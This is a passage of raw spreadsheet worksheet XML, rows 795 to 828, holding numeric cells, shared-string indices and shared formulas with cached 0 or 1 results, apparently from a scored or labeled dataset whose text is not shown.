      </c>
      <c r="G795" s="62">
        <v>0.85</v>
      </c>
      <c r="H795" s="64">
        <v>1.0</v>
      </c>
      <c r="I795" s="64" t="s">
        <v>134</v>
      </c>
      <c r="J795" s="65">
        <f t="shared" si="1"/>
        <v>1</v>
      </c>
      <c r="K795" s="65">
        <f t="shared" si="2"/>
        <v>1</v>
      </c>
      <c r="L795" s="65">
        <f t="shared" si="3"/>
        <v>1</v>
      </c>
      <c r="O795" s="62">
        <v>1.0</v>
      </c>
    </row>
    <row r="796">
      <c r="A796" s="62">
        <v>654.0</v>
      </c>
      <c r="B796" s="62" t="s">
        <v>92</v>
      </c>
      <c r="C796" s="63" t="s">
        <v>2587</v>
      </c>
      <c r="D796" s="62" t="s">
        <v>2588</v>
      </c>
      <c r="E796" s="62" t="s">
        <v>2589</v>
      </c>
      <c r="F796" s="62" t="s">
        <v>134</v>
      </c>
      <c r="G796" s="62">
        <v>0.95</v>
      </c>
      <c r="H796" s="64">
        <v>1.0</v>
      </c>
      <c r="I796" s="64" t="s">
        <v>134</v>
      </c>
      <c r="J796" s="65">
        <f t="shared" si="1"/>
        <v>1</v>
      </c>
      <c r="K796" s="65">
        <f t="shared" si="2"/>
        <v>1</v>
      </c>
      <c r="L796" s="65">
        <f t="shared" si="3"/>
        <v>1</v>
      </c>
      <c r="O796" s="62">
        <v>1.0</v>
      </c>
    </row>
    <row r="797">
      <c r="A797" s="62">
        <v>657.0</v>
      </c>
      <c r="B797" s="62" t="s">
        <v>92</v>
      </c>
      <c r="C797" s="63" t="s">
        <v>2590</v>
      </c>
      <c r="D797" s="62" t="s">
        <v>2591</v>
      </c>
      <c r="E797" s="62" t="s">
        <v>2592</v>
      </c>
      <c r="F797" s="62" t="s">
        <v>134</v>
      </c>
      <c r="G797" s="62">
        <v>0.9</v>
      </c>
      <c r="H797" s="64">
        <v>1.0</v>
      </c>
      <c r="I797" s="64" t="s">
        <v>134</v>
      </c>
      <c r="J797" s="65">
        <f t="shared" si="1"/>
        <v>1</v>
      </c>
      <c r="K797" s="65">
        <f t="shared" si="2"/>
        <v>1</v>
      </c>
      <c r="L797" s="65">
        <f t="shared" si="3"/>
        <v>1</v>
      </c>
      <c r="O797" s="62">
        <v>1.0</v>
      </c>
    </row>
    <row r="798">
      <c r="A798" s="62">
        <v>104.0</v>
      </c>
      <c r="B798" s="62" t="s">
        <v>94</v>
      </c>
      <c r="C798" s="63" t="s">
        <v>2593</v>
      </c>
      <c r="D798" s="62" t="s">
        <v>2594</v>
      </c>
      <c r="E798" s="62" t="s">
        <v>2595</v>
      </c>
      <c r="F798" s="62" t="s">
        <v>134</v>
      </c>
      <c r="G798" s="62">
        <v>0.9</v>
      </c>
      <c r="H798" s="64">
        <v>1.0</v>
      </c>
      <c r="I798" s="64" t="s">
        <v>134</v>
      </c>
      <c r="J798" s="65">
        <f t="shared" si="1"/>
        <v>1</v>
      </c>
      <c r="K798" s="65">
        <f t="shared" si="2"/>
        <v>1</v>
      </c>
      <c r="L798" s="65">
        <f t="shared" si="3"/>
        <v>1</v>
      </c>
      <c r="O798" s="62">
        <v>1.0</v>
      </c>
    </row>
    <row r="799">
      <c r="A799" s="62">
        <v>105.0</v>
      </c>
      <c r="B799" s="62" t="s">
        <v>94</v>
      </c>
      <c r="C799" s="63" t="s">
        <v>2596</v>
      </c>
      <c r="D799" s="62" t="s">
        <v>2597</v>
      </c>
      <c r="E799" s="62" t="s">
        <v>2598</v>
      </c>
      <c r="F799" s="62" t="s">
        <v>134</v>
      </c>
      <c r="G799" s="62">
        <v>0.85</v>
      </c>
      <c r="H799" s="64">
        <v>1.0</v>
      </c>
      <c r="I799" s="64" t="s">
        <v>134</v>
      </c>
      <c r="J799" s="65">
        <f t="shared" si="1"/>
        <v>1</v>
      </c>
      <c r="K799" s="65">
        <f t="shared" si="2"/>
        <v>1</v>
      </c>
      <c r="L799" s="65">
        <f t="shared" si="3"/>
        <v>1</v>
      </c>
      <c r="O799" s="62">
        <v>1.0</v>
      </c>
    </row>
    <row r="800">
      <c r="A800" s="62">
        <v>161.0</v>
      </c>
      <c r="B800" s="62" t="s">
        <v>94</v>
      </c>
      <c r="C800" s="63" t="s">
        <v>2599</v>
      </c>
      <c r="D800" s="62" t="s">
        <v>2600</v>
      </c>
      <c r="E800" s="62" t="s">
        <v>2601</v>
      </c>
      <c r="F800" s="62" t="s">
        <v>134</v>
      </c>
      <c r="G800" s="62">
        <v>0.9</v>
      </c>
      <c r="H800" s="64">
        <v>0.0</v>
      </c>
      <c r="I800" s="64" t="s">
        <v>158</v>
      </c>
      <c r="J800" s="65">
        <f t="shared" si="1"/>
        <v>0</v>
      </c>
      <c r="K800" s="65">
        <f t="shared" si="2"/>
        <v>0</v>
      </c>
      <c r="L800" s="65">
        <f t="shared" si="3"/>
        <v>0</v>
      </c>
      <c r="M800" s="62" t="s">
        <v>2602</v>
      </c>
      <c r="N800" s="62" t="s">
        <v>199</v>
      </c>
      <c r="O800" s="62">
        <v>1.0</v>
      </c>
    </row>
    <row r="801">
      <c r="A801" s="62">
        <v>196.0</v>
      </c>
      <c r="B801" s="62" t="s">
        <v>94</v>
      </c>
      <c r="C801" s="63" t="s">
        <v>2603</v>
      </c>
      <c r="D801" s="62" t="s">
        <v>2604</v>
      </c>
      <c r="E801" s="62" t="s">
        <v>2605</v>
      </c>
      <c r="F801" s="62" t="s">
        <v>134</v>
      </c>
      <c r="G801" s="62">
        <v>0.85</v>
      </c>
      <c r="H801" s="64">
        <v>1.0</v>
      </c>
      <c r="I801" s="64" t="s">
        <v>134</v>
      </c>
      <c r="J801" s="65">
        <f t="shared" si="1"/>
        <v>1</v>
      </c>
      <c r="K801" s="65">
        <f t="shared" si="2"/>
        <v>1</v>
      </c>
      <c r="L801" s="65">
        <f t="shared" si="3"/>
        <v>1</v>
      </c>
      <c r="O801" s="62">
        <v>1.0</v>
      </c>
    </row>
    <row r="802">
      <c r="A802" s="62">
        <v>203.0</v>
      </c>
      <c r="B802" s="62" t="s">
        <v>94</v>
      </c>
      <c r="C802" s="63" t="s">
        <v>2606</v>
      </c>
      <c r="D802" s="62" t="s">
        <v>2607</v>
      </c>
      <c r="E802" s="62" t="s">
        <v>2608</v>
      </c>
      <c r="F802" s="62" t="s">
        <v>134</v>
      </c>
      <c r="G802" s="62">
        <v>0.9</v>
      </c>
      <c r="H802" s="64">
        <v>0.0</v>
      </c>
      <c r="I802" s="64" t="s">
        <v>158</v>
      </c>
      <c r="J802" s="65">
        <f t="shared" si="1"/>
        <v>0</v>
      </c>
      <c r="K802" s="65">
        <f t="shared" si="2"/>
        <v>0</v>
      </c>
      <c r="L802" s="65">
        <f t="shared" si="3"/>
        <v>0</v>
      </c>
      <c r="O802" s="62">
        <v>1.0</v>
      </c>
    </row>
    <row r="803">
      <c r="A803" s="62">
        <v>204.0</v>
      </c>
      <c r="B803" s="62" t="s">
        <v>94</v>
      </c>
      <c r="C803" s="63" t="s">
        <v>2609</v>
      </c>
      <c r="D803" s="62" t="s">
        <v>2610</v>
      </c>
      <c r="E803" s="62" t="s">
        <v>2611</v>
      </c>
      <c r="F803" s="62" t="s">
        <v>134</v>
      </c>
      <c r="G803" s="62">
        <v>0.9</v>
      </c>
      <c r="H803" s="64">
        <v>0.0</v>
      </c>
      <c r="I803" s="64" t="s">
        <v>158</v>
      </c>
      <c r="J803" s="65">
        <f t="shared" si="1"/>
        <v>0</v>
      </c>
      <c r="K803" s="65">
        <f t="shared" si="2"/>
        <v>0</v>
      </c>
      <c r="L803" s="65">
        <f t="shared" si="3"/>
        <v>0</v>
      </c>
      <c r="O803" s="62">
        <v>1.0</v>
      </c>
    </row>
    <row r="804">
      <c r="A804" s="62">
        <v>228.0</v>
      </c>
      <c r="B804" s="62" t="s">
        <v>94</v>
      </c>
      <c r="C804" s="63" t="s">
        <v>2612</v>
      </c>
      <c r="D804" s="62" t="s">
        <v>2613</v>
      </c>
      <c r="E804" s="62" t="s">
        <v>2614</v>
      </c>
      <c r="F804" s="62" t="s">
        <v>134</v>
      </c>
      <c r="G804" s="62">
        <v>0.85</v>
      </c>
      <c r="H804" s="64">
        <v>0.0</v>
      </c>
      <c r="I804" s="64" t="s">
        <v>2615</v>
      </c>
      <c r="J804" s="65">
        <f t="shared" si="1"/>
        <v>0</v>
      </c>
      <c r="K804" s="65">
        <f t="shared" si="2"/>
        <v>0</v>
      </c>
      <c r="L804" s="65">
        <f t="shared" si="3"/>
        <v>0</v>
      </c>
      <c r="O804" s="62">
        <v>1.0</v>
      </c>
    </row>
    <row r="805">
      <c r="A805" s="62">
        <v>289.0</v>
      </c>
      <c r="B805" s="62" t="s">
        <v>94</v>
      </c>
      <c r="C805" s="63" t="s">
        <v>2616</v>
      </c>
      <c r="D805" s="62" t="s">
        <v>2617</v>
      </c>
      <c r="E805" s="62" t="s">
        <v>2618</v>
      </c>
      <c r="F805" s="62" t="s">
        <v>134</v>
      </c>
      <c r="G805" s="62">
        <v>0.9</v>
      </c>
      <c r="H805" s="64">
        <v>1.0</v>
      </c>
      <c r="I805" s="64" t="s">
        <v>134</v>
      </c>
      <c r="J805" s="65">
        <f t="shared" si="1"/>
        <v>1</v>
      </c>
      <c r="K805" s="65">
        <f t="shared" si="2"/>
        <v>1</v>
      </c>
      <c r="L805" s="65">
        <f t="shared" si="3"/>
        <v>1</v>
      </c>
      <c r="M805" s="62" t="s">
        <v>2619</v>
      </c>
      <c r="N805" s="62" t="s">
        <v>2620</v>
      </c>
      <c r="O805" s="62">
        <v>1.0</v>
      </c>
    </row>
    <row r="806">
      <c r="A806" s="62">
        <v>353.0</v>
      </c>
      <c r="B806" s="62" t="s">
        <v>94</v>
      </c>
      <c r="C806" s="63" t="s">
        <v>2621</v>
      </c>
      <c r="D806" s="62" t="s">
        <v>2622</v>
      </c>
      <c r="E806" s="62" t="s">
        <v>2623</v>
      </c>
      <c r="F806" s="62" t="s">
        <v>134</v>
      </c>
      <c r="G806" s="62">
        <v>0.9</v>
      </c>
      <c r="H806" s="64">
        <v>1.0</v>
      </c>
      <c r="I806" s="64" t="s">
        <v>134</v>
      </c>
      <c r="J806" s="65">
        <f t="shared" si="1"/>
        <v>1</v>
      </c>
      <c r="K806" s="65">
        <f t="shared" si="2"/>
        <v>1</v>
      </c>
      <c r="L806" s="65">
        <f t="shared" si="3"/>
        <v>1</v>
      </c>
      <c r="O806" s="62">
        <v>1.0</v>
      </c>
    </row>
    <row r="807">
      <c r="A807" s="62">
        <v>384.0</v>
      </c>
      <c r="B807" s="62" t="s">
        <v>94</v>
      </c>
      <c r="C807" s="63" t="s">
        <v>2624</v>
      </c>
      <c r="D807" s="62" t="s">
        <v>2625</v>
      </c>
      <c r="E807" s="62" t="s">
        <v>2626</v>
      </c>
      <c r="F807" s="62" t="s">
        <v>134</v>
      </c>
      <c r="G807" s="62">
        <v>0.9</v>
      </c>
      <c r="H807" s="64">
        <v>1.0</v>
      </c>
      <c r="I807" s="64" t="s">
        <v>134</v>
      </c>
      <c r="J807" s="65">
        <f t="shared" si="1"/>
        <v>1</v>
      </c>
      <c r="K807" s="65">
        <f t="shared" si="2"/>
        <v>1</v>
      </c>
      <c r="L807" s="65">
        <f t="shared" si="3"/>
        <v>1</v>
      </c>
      <c r="O807" s="62">
        <v>1.0</v>
      </c>
    </row>
    <row r="808">
      <c r="A808" s="62">
        <v>469.0</v>
      </c>
      <c r="B808" s="62" t="s">
        <v>94</v>
      </c>
      <c r="C808" s="63" t="s">
        <v>2627</v>
      </c>
      <c r="D808" s="62" t="s">
        <v>2628</v>
      </c>
      <c r="F808" s="62" t="s">
        <v>134</v>
      </c>
      <c r="G808" s="62">
        <v>0.85</v>
      </c>
      <c r="H808" s="64">
        <v>1.0</v>
      </c>
      <c r="I808" s="64" t="s">
        <v>134</v>
      </c>
      <c r="J808" s="65">
        <f t="shared" si="1"/>
        <v>1</v>
      </c>
      <c r="K808" s="65">
        <f t="shared" si="2"/>
        <v>1</v>
      </c>
      <c r="L808" s="65">
        <f t="shared" si="3"/>
        <v>1</v>
      </c>
      <c r="O808" s="62">
        <v>1.0</v>
      </c>
    </row>
    <row r="809">
      <c r="A809" s="62">
        <v>36.0</v>
      </c>
      <c r="B809" s="62" t="s">
        <v>96</v>
      </c>
      <c r="C809" s="63" t="s">
        <v>2629</v>
      </c>
      <c r="D809" s="62" t="s">
        <v>2630</v>
      </c>
      <c r="E809" s="62" t="s">
        <v>2631</v>
      </c>
      <c r="F809" s="62" t="s">
        <v>134</v>
      </c>
      <c r="G809" s="62">
        <v>0.9</v>
      </c>
      <c r="H809" s="64">
        <v>1.0</v>
      </c>
      <c r="I809" s="64" t="s">
        <v>134</v>
      </c>
      <c r="J809" s="65">
        <f t="shared" si="1"/>
        <v>1</v>
      </c>
      <c r="K809" s="65">
        <f t="shared" si="2"/>
        <v>1</v>
      </c>
      <c r="L809" s="65">
        <f t="shared" si="3"/>
        <v>1</v>
      </c>
      <c r="O809" s="62">
        <v>1.0</v>
      </c>
    </row>
    <row r="810">
      <c r="A810" s="62">
        <v>398.0</v>
      </c>
      <c r="B810" s="62" t="s">
        <v>96</v>
      </c>
      <c r="C810" s="63" t="s">
        <v>2632</v>
      </c>
      <c r="D810" s="62" t="s">
        <v>2633</v>
      </c>
      <c r="E810" s="62" t="s">
        <v>2634</v>
      </c>
      <c r="F810" s="62" t="s">
        <v>134</v>
      </c>
      <c r="G810" s="62">
        <v>0.85</v>
      </c>
      <c r="H810" s="64">
        <v>1.0</v>
      </c>
      <c r="I810" s="64" t="s">
        <v>134</v>
      </c>
      <c r="J810" s="65">
        <f t="shared" si="1"/>
        <v>1</v>
      </c>
      <c r="K810" s="65">
        <f t="shared" si="2"/>
        <v>1</v>
      </c>
      <c r="L810" s="65">
        <f t="shared" si="3"/>
        <v>1</v>
      </c>
      <c r="O810" s="62">
        <v>1.0</v>
      </c>
    </row>
    <row r="811">
      <c r="A811" s="62">
        <v>408.0</v>
      </c>
      <c r="B811" s="62" t="s">
        <v>96</v>
      </c>
      <c r="C811" s="63" t="s">
        <v>2635</v>
      </c>
      <c r="D811" s="62" t="s">
        <v>2636</v>
      </c>
      <c r="E811" s="62" t="s">
        <v>2637</v>
      </c>
      <c r="F811" s="62" t="s">
        <v>134</v>
      </c>
      <c r="G811" s="62">
        <v>0.9</v>
      </c>
      <c r="H811" s="64">
        <v>1.0</v>
      </c>
      <c r="I811" s="64" t="s">
        <v>134</v>
      </c>
      <c r="J811" s="65">
        <f t="shared" si="1"/>
        <v>1</v>
      </c>
      <c r="K811" s="65">
        <f t="shared" si="2"/>
        <v>1</v>
      </c>
      <c r="L811" s="65">
        <f t="shared" si="3"/>
        <v>1</v>
      </c>
      <c r="O811" s="62">
        <v>1.0</v>
      </c>
    </row>
    <row r="812">
      <c r="A812" s="62">
        <v>856.0</v>
      </c>
      <c r="B812" s="62" t="s">
        <v>96</v>
      </c>
      <c r="C812" s="63" t="s">
        <v>2638</v>
      </c>
      <c r="D812" s="62" t="s">
        <v>2639</v>
      </c>
      <c r="E812" s="62" t="s">
        <v>2640</v>
      </c>
      <c r="F812" s="62" t="s">
        <v>134</v>
      </c>
      <c r="G812" s="62">
        <v>0.95</v>
      </c>
      <c r="H812" s="64">
        <v>1.0</v>
      </c>
      <c r="I812" s="64" t="s">
        <v>134</v>
      </c>
      <c r="J812" s="65">
        <f t="shared" si="1"/>
        <v>1</v>
      </c>
      <c r="K812" s="65">
        <f t="shared" si="2"/>
        <v>1</v>
      </c>
      <c r="L812" s="65">
        <f t="shared" si="3"/>
        <v>1</v>
      </c>
      <c r="O812" s="62">
        <v>1.0</v>
      </c>
    </row>
    <row r="813">
      <c r="A813" s="62">
        <v>857.0</v>
      </c>
      <c r="B813" s="62" t="s">
        <v>96</v>
      </c>
      <c r="C813" s="63" t="s">
        <v>2641</v>
      </c>
      <c r="D813" s="62" t="s">
        <v>2642</v>
      </c>
      <c r="E813" s="62" t="s">
        <v>2643</v>
      </c>
      <c r="F813" s="62" t="s">
        <v>134</v>
      </c>
      <c r="G813" s="62">
        <v>0.9</v>
      </c>
      <c r="H813" s="64">
        <v>1.0</v>
      </c>
      <c r="I813" s="64" t="s">
        <v>134</v>
      </c>
      <c r="J813" s="65">
        <f t="shared" si="1"/>
        <v>1</v>
      </c>
      <c r="K813" s="65">
        <f t="shared" si="2"/>
        <v>1</v>
      </c>
      <c r="L813" s="65">
        <f t="shared" si="3"/>
        <v>1</v>
      </c>
      <c r="O813" s="62">
        <v>1.0</v>
      </c>
    </row>
    <row r="814">
      <c r="A814" s="62">
        <v>858.0</v>
      </c>
      <c r="B814" s="62" t="s">
        <v>96</v>
      </c>
      <c r="C814" s="63" t="s">
        <v>2644</v>
      </c>
      <c r="D814" s="62" t="s">
        <v>2645</v>
      </c>
      <c r="E814" s="62" t="s">
        <v>2646</v>
      </c>
      <c r="F814" s="62" t="s">
        <v>134</v>
      </c>
      <c r="G814" s="62">
        <v>0.95</v>
      </c>
      <c r="H814" s="64">
        <v>1.0</v>
      </c>
      <c r="I814" s="64" t="s">
        <v>134</v>
      </c>
      <c r="J814" s="65">
        <f t="shared" si="1"/>
        <v>1</v>
      </c>
      <c r="K814" s="65">
        <f t="shared" si="2"/>
        <v>1</v>
      </c>
      <c r="L814" s="65">
        <f t="shared" si="3"/>
        <v>1</v>
      </c>
      <c r="O814" s="62">
        <v>1.0</v>
      </c>
    </row>
    <row r="815">
      <c r="A815" s="62">
        <v>943.0</v>
      </c>
      <c r="B815" s="62" t="s">
        <v>96</v>
      </c>
      <c r="C815" s="63" t="s">
        <v>2647</v>
      </c>
      <c r="D815" s="62" t="s">
        <v>2648</v>
      </c>
      <c r="E815" s="62" t="s">
        <v>2649</v>
      </c>
      <c r="F815" s="62" t="s">
        <v>134</v>
      </c>
      <c r="G815" s="62">
        <v>0.9</v>
      </c>
      <c r="H815" s="64">
        <v>0.0</v>
      </c>
      <c r="I815" s="64" t="s">
        <v>158</v>
      </c>
      <c r="J815" s="65">
        <f t="shared" si="1"/>
        <v>0</v>
      </c>
      <c r="K815" s="65">
        <f t="shared" si="2"/>
        <v>0</v>
      </c>
      <c r="L815" s="65">
        <f t="shared" si="3"/>
        <v>0</v>
      </c>
      <c r="O815" s="62">
        <v>1.0</v>
      </c>
    </row>
    <row r="816">
      <c r="A816" s="62">
        <v>9.0</v>
      </c>
      <c r="B816" s="62" t="s">
        <v>98</v>
      </c>
      <c r="C816" s="63" t="s">
        <v>2650</v>
      </c>
      <c r="D816" s="62" t="s">
        <v>2651</v>
      </c>
      <c r="E816" s="62" t="s">
        <v>2652</v>
      </c>
      <c r="F816" s="62" t="s">
        <v>134</v>
      </c>
      <c r="G816" s="62">
        <v>0.9</v>
      </c>
      <c r="H816" s="64">
        <v>1.0</v>
      </c>
      <c r="I816" s="64" t="s">
        <v>134</v>
      </c>
      <c r="J816" s="65">
        <f t="shared" si="1"/>
        <v>1</v>
      </c>
      <c r="K816" s="65">
        <f t="shared" si="2"/>
        <v>1</v>
      </c>
      <c r="L816" s="65">
        <f t="shared" si="3"/>
        <v>1</v>
      </c>
      <c r="O816" s="62">
        <v>1.0</v>
      </c>
    </row>
    <row r="817">
      <c r="A817" s="62">
        <v>17.0</v>
      </c>
      <c r="B817" s="62" t="s">
        <v>98</v>
      </c>
      <c r="C817" s="63" t="s">
        <v>2653</v>
      </c>
      <c r="D817" s="62" t="s">
        <v>2654</v>
      </c>
      <c r="E817" s="62" t="s">
        <v>2655</v>
      </c>
      <c r="F817" s="62" t="s">
        <v>134</v>
      </c>
      <c r="G817" s="62">
        <v>0.9</v>
      </c>
      <c r="H817" s="64">
        <v>1.0</v>
      </c>
      <c r="I817" s="64" t="s">
        <v>134</v>
      </c>
      <c r="J817" s="65">
        <f t="shared" si="1"/>
        <v>1</v>
      </c>
      <c r="K817" s="65">
        <f t="shared" si="2"/>
        <v>1</v>
      </c>
      <c r="L817" s="65">
        <f t="shared" si="3"/>
        <v>1</v>
      </c>
      <c r="O817" s="62">
        <v>1.0</v>
      </c>
    </row>
    <row r="818">
      <c r="A818" s="62">
        <v>61.0</v>
      </c>
      <c r="B818" s="62" t="s">
        <v>98</v>
      </c>
      <c r="C818" s="63" t="s">
        <v>2656</v>
      </c>
      <c r="D818" s="62" t="s">
        <v>2657</v>
      </c>
      <c r="E818" s="62" t="s">
        <v>2658</v>
      </c>
      <c r="F818" s="62" t="s">
        <v>134</v>
      </c>
      <c r="G818" s="62">
        <v>0.9</v>
      </c>
      <c r="H818" s="64">
        <v>1.0</v>
      </c>
      <c r="I818" s="64" t="s">
        <v>134</v>
      </c>
      <c r="J818" s="65">
        <f t="shared" si="1"/>
        <v>1</v>
      </c>
      <c r="K818" s="65">
        <f t="shared" si="2"/>
        <v>1</v>
      </c>
      <c r="L818" s="65">
        <f t="shared" si="3"/>
        <v>1</v>
      </c>
      <c r="O818" s="62">
        <v>1.0</v>
      </c>
    </row>
    <row r="819">
      <c r="A819" s="62">
        <v>86.0</v>
      </c>
      <c r="B819" s="62" t="s">
        <v>98</v>
      </c>
      <c r="C819" s="63" t="s">
        <v>2659</v>
      </c>
      <c r="D819" s="62" t="s">
        <v>2660</v>
      </c>
      <c r="E819" s="62" t="s">
        <v>2661</v>
      </c>
      <c r="F819" s="62" t="s">
        <v>134</v>
      </c>
      <c r="G819" s="62">
        <v>0.9</v>
      </c>
      <c r="H819" s="64">
        <v>1.0</v>
      </c>
      <c r="I819" s="64" t="s">
        <v>134</v>
      </c>
      <c r="J819" s="65">
        <f t="shared" si="1"/>
        <v>1</v>
      </c>
      <c r="K819" s="65">
        <f t="shared" si="2"/>
        <v>1</v>
      </c>
      <c r="L819" s="65">
        <f t="shared" si="3"/>
        <v>1</v>
      </c>
      <c r="O819" s="62">
        <v>1.0</v>
      </c>
    </row>
    <row r="820">
      <c r="A820" s="62">
        <v>102.0</v>
      </c>
      <c r="B820" s="62" t="s">
        <v>98</v>
      </c>
      <c r="C820" s="63" t="s">
        <v>2662</v>
      </c>
      <c r="D820" s="62" t="s">
        <v>2663</v>
      </c>
      <c r="E820" s="62" t="s">
        <v>2664</v>
      </c>
      <c r="F820" s="62" t="s">
        <v>134</v>
      </c>
      <c r="G820" s="62">
        <v>0.9</v>
      </c>
      <c r="H820" s="64">
        <v>1.0</v>
      </c>
      <c r="I820" s="64" t="s">
        <v>134</v>
      </c>
      <c r="J820" s="65">
        <f t="shared" si="1"/>
        <v>1</v>
      </c>
      <c r="K820" s="65">
        <f t="shared" si="2"/>
        <v>1</v>
      </c>
      <c r="L820" s="65">
        <f t="shared" si="3"/>
        <v>1</v>
      </c>
      <c r="O820" s="62">
        <v>1.0</v>
      </c>
    </row>
    <row r="821">
      <c r="A821" s="62">
        <v>130.0</v>
      </c>
      <c r="B821" s="62" t="s">
        <v>98</v>
      </c>
      <c r="C821" s="63" t="s">
        <v>2665</v>
      </c>
      <c r="D821" s="62" t="s">
        <v>2666</v>
      </c>
      <c r="E821" s="62" t="s">
        <v>2667</v>
      </c>
      <c r="F821" s="62" t="s">
        <v>134</v>
      </c>
      <c r="G821" s="62">
        <v>0.95</v>
      </c>
      <c r="H821" s="64">
        <v>1.0</v>
      </c>
      <c r="I821" s="64" t="s">
        <v>134</v>
      </c>
      <c r="J821" s="65">
        <f t="shared" si="1"/>
        <v>1</v>
      </c>
      <c r="K821" s="65">
        <f t="shared" si="2"/>
        <v>1</v>
      </c>
      <c r="L821" s="65">
        <f t="shared" si="3"/>
        <v>1</v>
      </c>
      <c r="O821" s="62">
        <v>1.0</v>
      </c>
    </row>
    <row r="822">
      <c r="A822" s="62">
        <v>145.0</v>
      </c>
      <c r="B822" s="62" t="s">
        <v>98</v>
      </c>
      <c r="C822" s="63" t="s">
        <v>2668</v>
      </c>
      <c r="D822" s="62" t="s">
        <v>2669</v>
      </c>
      <c r="E822" s="62" t="s">
        <v>2670</v>
      </c>
      <c r="F822" s="62" t="s">
        <v>134</v>
      </c>
      <c r="G822" s="62">
        <v>0.95</v>
      </c>
      <c r="H822" s="64">
        <v>1.0</v>
      </c>
      <c r="I822" s="64" t="s">
        <v>134</v>
      </c>
      <c r="J822" s="65">
        <f t="shared" si="1"/>
        <v>1</v>
      </c>
      <c r="K822" s="65">
        <f t="shared" si="2"/>
        <v>1</v>
      </c>
      <c r="L822" s="65">
        <f t="shared" si="3"/>
        <v>1</v>
      </c>
      <c r="O822" s="62">
        <v>1.0</v>
      </c>
    </row>
    <row r="823">
      <c r="A823" s="62">
        <v>165.0</v>
      </c>
      <c r="B823" s="62" t="s">
        <v>98</v>
      </c>
      <c r="C823" s="63" t="s">
        <v>2671</v>
      </c>
      <c r="D823" s="62" t="s">
        <v>2672</v>
      </c>
      <c r="E823" s="62" t="s">
        <v>2673</v>
      </c>
      <c r="F823" s="62" t="s">
        <v>134</v>
      </c>
      <c r="G823" s="62">
        <v>0.9</v>
      </c>
      <c r="H823" s="64">
        <v>1.0</v>
      </c>
      <c r="I823" s="64" t="s">
        <v>134</v>
      </c>
      <c r="J823" s="65">
        <f t="shared" si="1"/>
        <v>1</v>
      </c>
      <c r="K823" s="65">
        <f t="shared" si="2"/>
        <v>1</v>
      </c>
      <c r="L823" s="65">
        <f t="shared" si="3"/>
        <v>1</v>
      </c>
      <c r="O823" s="62">
        <v>1.0</v>
      </c>
    </row>
    <row r="824">
      <c r="A824" s="62">
        <v>220.0</v>
      </c>
      <c r="B824" s="62" t="s">
        <v>98</v>
      </c>
      <c r="C824" s="63" t="s">
        <v>2674</v>
      </c>
      <c r="D824" s="62" t="s">
        <v>2675</v>
      </c>
      <c r="E824" s="62" t="s">
        <v>2676</v>
      </c>
      <c r="F824" s="62" t="s">
        <v>134</v>
      </c>
      <c r="G824" s="62">
        <v>0.95</v>
      </c>
      <c r="H824" s="64">
        <v>1.0</v>
      </c>
      <c r="I824" s="64" t="s">
        <v>134</v>
      </c>
      <c r="J824" s="65">
        <f t="shared" si="1"/>
        <v>1</v>
      </c>
      <c r="K824" s="65">
        <f t="shared" si="2"/>
        <v>1</v>
      </c>
      <c r="L824" s="65">
        <f t="shared" si="3"/>
        <v>1</v>
      </c>
      <c r="O824" s="62">
        <v>1.0</v>
      </c>
    </row>
    <row r="825">
      <c r="A825" s="62">
        <v>735.0</v>
      </c>
      <c r="B825" s="62" t="s">
        <v>100</v>
      </c>
      <c r="C825" s="63" t="s">
        <v>2677</v>
      </c>
      <c r="D825" s="62" t="s">
        <v>2678</v>
      </c>
      <c r="E825" s="62" t="s">
        <v>2679</v>
      </c>
      <c r="F825" s="62" t="s">
        <v>134</v>
      </c>
      <c r="G825" s="62">
        <v>0.9</v>
      </c>
      <c r="H825" s="64">
        <v>0.0</v>
      </c>
      <c r="I825" s="64" t="s">
        <v>158</v>
      </c>
      <c r="J825" s="65">
        <f t="shared" si="1"/>
        <v>0</v>
      </c>
      <c r="K825" s="65">
        <f t="shared" si="2"/>
        <v>0</v>
      </c>
      <c r="L825" s="65">
        <f t="shared" si="3"/>
        <v>0</v>
      </c>
      <c r="O825" s="62">
        <v>1.0</v>
      </c>
    </row>
    <row r="826">
      <c r="A826" s="62">
        <v>20271.0</v>
      </c>
      <c r="B826" s="62" t="s">
        <v>102</v>
      </c>
      <c r="C826" s="63" t="s">
        <v>2680</v>
      </c>
      <c r="D826" s="62" t="s">
        <v>2681</v>
      </c>
      <c r="E826" s="62" t="s">
        <v>2682</v>
      </c>
      <c r="F826" s="62" t="s">
        <v>134</v>
      </c>
      <c r="G826" s="62">
        <v>0.95</v>
      </c>
      <c r="H826" s="64">
        <v>1.0</v>
      </c>
      <c r="I826" s="64" t="s">
        <v>134</v>
      </c>
      <c r="J826" s="65">
        <f t="shared" si="1"/>
        <v>1</v>
      </c>
      <c r="K826" s="65">
        <f t="shared" si="2"/>
        <v>1</v>
      </c>
      <c r="L826" s="65">
        <f t="shared" si="3"/>
        <v>1</v>
      </c>
      <c r="O826" s="62">
        <v>1.0</v>
      </c>
    </row>
    <row r="827">
      <c r="A827" s="62">
        <v>20383.0</v>
      </c>
      <c r="B827" s="62" t="s">
        <v>102</v>
      </c>
      <c r="C827" s="63" t="s">
        <v>2683</v>
      </c>
      <c r="D827" s="62" t="s">
        <v>2684</v>
      </c>
      <c r="E827" s="62" t="s">
        <v>2685</v>
      </c>
      <c r="F827" s="62" t="s">
        <v>134</v>
      </c>
      <c r="G827" s="62">
        <v>0.9</v>
      </c>
      <c r="H827" s="64">
        <v>1.0</v>
      </c>
      <c r="I827" s="64" t="s">
        <v>134</v>
      </c>
      <c r="J827" s="65">
        <f t="shared" si="1"/>
        <v>1</v>
      </c>
      <c r="K827" s="65">
        <f t="shared" si="2"/>
        <v>1</v>
      </c>
      <c r="L827" s="65">
        <f t="shared" si="3"/>
        <v>1</v>
      </c>
      <c r="O827" s="62">
        <v>1.0</v>
      </c>
    </row>
    <row r="828">
      <c r="A828" s="62">
        <v>20509.0</v>
      </c>
      <c r="B828" s="62" t="s">
        <v>102</v>
      </c>
      <c r="C828" s="63" t="s">
        <v>2686</v>
      </c>
      <c r="D828" s="62" t="s">
        <v>2687</v>
      </c>
      <c r="E828" s="62" t="s">
        <v>2688</v>
      </c>
      <c r="F828" s="62" t="s">
        <v>134</v>
      </c>
      <c r="G828" s="62">
        <v>0.9</v>
      </c>
      <c r="H828" s="64">
        <v>1.0</v>
      </c>
      <c r="I828" s="64" t="s">
        <v>134</v>
      </c>
      <c r="J828" s="65">
        <f t="shared" si="1"/>
        <v>1</v>
      </c>
      <c r="K828" s="65">
        <f t="shared" si="2"/>
        <v>1</v>
      </c>
      <c r="L828" s="65">
        <f t="shared" si="3"/>
        <v>1</v>
      </c>
      <c r="O828" s="62">
        <v>1.0</v>
      </c>
